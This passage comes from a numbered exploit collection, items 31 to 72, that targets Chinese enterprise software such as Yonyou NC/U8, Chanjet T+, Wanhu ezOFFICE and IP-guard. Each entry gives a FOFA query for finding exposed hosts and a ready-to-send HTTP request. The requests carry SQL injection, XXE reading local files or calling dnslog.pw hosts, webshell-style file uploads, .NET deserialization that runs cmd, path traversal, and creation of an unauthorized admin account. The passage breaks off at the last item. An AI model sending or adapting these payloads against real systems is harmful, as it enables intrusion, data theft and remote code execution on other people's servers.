GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo API SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php API arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The file is returned at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

